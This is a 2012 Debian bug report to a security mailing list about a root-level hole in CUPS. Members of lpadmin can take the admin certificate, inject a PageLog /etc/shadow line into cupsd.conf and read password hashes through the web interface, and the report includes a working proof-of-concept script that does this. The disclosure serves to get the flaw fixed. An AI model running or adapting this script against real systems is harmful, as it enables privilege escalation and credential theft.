[Secure-testing-team] Bug#692791: members of lpadmin can read every file on server via cups

Jörg Ludwig joerg.ludwig at iserv.eu
Thu Nov 8 22:23:41 UTC 2012 

Package: cups
Version: 1.4.4-7+squeeze1
Severity: critical
Tags: security
Justification: root security hole

Members of lpadmin cat read /var/run/cups/certs/0. With this key it is possible to access the cups web interface as admin. You can edit the cups config file and set the page log to any filename you want (for example /etc/shadow). Then you can read the file contents by viewing the cups page log. By printing you can also write some random data to the given file.

As it is not possible to use the cups authentication with a normal webbrowser I created a simple shell script to show the effect. When called as any unprivileged user which is member of lpadmin it should display the contents of /etc/shadow:


#!/bin/sh
set -e

# backup cupsd.conf
cp /etc/cups/cupsd.conf /tmp

AUTH="Authorization: Local $(cat /var/run/cups/certs/0)"

POST -d -H "$AUTH" -H "Cookie: org.cups.sid="
http://localhost:631/admin/ <<EOF
OP=config-server&org.cups.sid=&SAVECHANGES=1&CUPSDCONF=Listen
localhost:631%0APageLog /etc/shadow
EOF

GET http://localhost:631/admin/log/page_log


This bug was detected by one of our customers, Jann Horn.

-- System Information:
Debian Release: 6.0.6
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: i386 (x86_64)

Kernel: Linux 2.6.32-5-amd64 (SMP w/8 CPU cores)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=en_US.utf8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages cups depends on:
ii  adduser             3.112+nmu2           add and remove users and groups
ii  bc                  1.06.95-2            The GNU bc arbitrary precision cal
ii  cups-client         1.4.4-7+squeeze1     Common UNIX Printing System(tm) - 
ii  cups-common         1.4.4-7+squeeze1     Common UNIX Printing System(tm) - 
ii  cups-ppdc           1.4.4-7+squeeze1     Common UNIX Printing System(tm) - 
ii  debconf [debconf-2. 1.5.36.1             Debian configuration management sy
ii  ghostscript         8.71~dfsg2-9         The GPL Ghostscript PostScript/PDF
ii  libavahi-client3    0.6.27-2+squeeze1    Avahi client library
ii  libavahi-common3    0.6.27-2+squeeze1    Avahi common library
ii  libc6               2.11.3-4             Embedded GNU C Library: Shared lib
ii  libcups2            1.4.4-7+squeeze1     Common UNIX Printing System(tm) - 
ii  libcupscgi1         1.4.4-7+squeeze1     Common UNIX Printing System(tm) - 
ii  libcupsdriver1      1.4.4-7+squeeze1     Common UNIX Printing System(tm) - 
ii  libcupsimage2       1.4.4-7+squeeze1     Common UNIX Printing System(tm) - 
ii  libcupsmime1        1.4.4-7+squeeze1     Common UNIX Printing System(tm) - 
ii  libcupsppdc1        1.4.4-7+squeeze1     Common UNIX Printing System(tm) - 
ii  libdbus-1-3         1.2.24-4+squeeze1    simple interprocess messaging syst
ii  libgcc1             1:4.4.5-8            GCC support library
ii  libgnutls26         2.8.6-1+squeeze2     the GNU TLS library - runtime libr
ii  libgssapi-krb5-2    1.8.3+dfsg-4squeeze6 MIT Kerberos runtime libraries - k
ii  libijs-0.35         0.35-7               IJS raster image transport protoco
ii  libkrb5-3           1.8.3+dfsg-4squeeze6 MIT Kerberos runtime libraries
ii  libldap-2.4-2       2.4.23-7.2           OpenLDAP libraries
ii  libpam0g            1.1.1-6.1+squeeze1   Pluggable Authentication Modules l
ii  libpaper1           1.1.24               library for handling paper charact
ii  libpoppler5         0.12.4-1.2           PDF rendering library
ii  libslp1             1.2.1-7.8            OpenSLP libraries
ii  libstdc++6          4.4.5-8              The GNU Standard C++ Library v3
ii  libusb-0.1-4        2:0.1.12-16          userspace USB programming library
ii  lsb-base            3.2-23.2squeeze1     Linux Standard Base 3.2 init scrip
ii  poppler-utils       0.12.4-1.2           PDF utilitites (based on libpopple
ii  procps              1:3.2.8-9squeeze1    /proc file system utilities
ii  ssl-cert            1.0.28               simple debconf wrapper for OpenSSL
ii  ttf-freefont        20090104-7           Freefont Serif, Sans and Mono True
ii  zlib1g              1:1.2.3.4.dfsg-3     compression library - runtime

Versions of packages cups recommends:
ii  cups-driver-gutenprint  5.2.6-1          printer drivers for CUPS
ii  foomatic-filters        4.0.5-6+squeeze2 OpenPrinting printer support - fil
ii  ghostscript-cups        8.71~dfsg2-9     The GPL Ghostscript PostScript/PDF

Versions of packages cups suggests:
ii  cups-bsd               1.4.4-7+squeeze1  Common UNIX Printing System(tm) - 
pn  cups-pdf               <none>            (no description available)
ii  foomatic-db            20100630-1        OpenPrinting printer support - dat
pn  hplip                  <none>            (no description available)
ii  smbclient              2:3.6.6-2~bpo60+1 command-line SMB/CIFS clients for 
ii  udev                   164-3             /dev/ and hotplug management daemo
pn  xpdf-korean | xpdf-jap <none>            (no description available)

-- Configuration Files:
/etc/cups/cupsd.conf changed [not included]

-- debconf information excluded

More information about the Secure-testing-team mailing list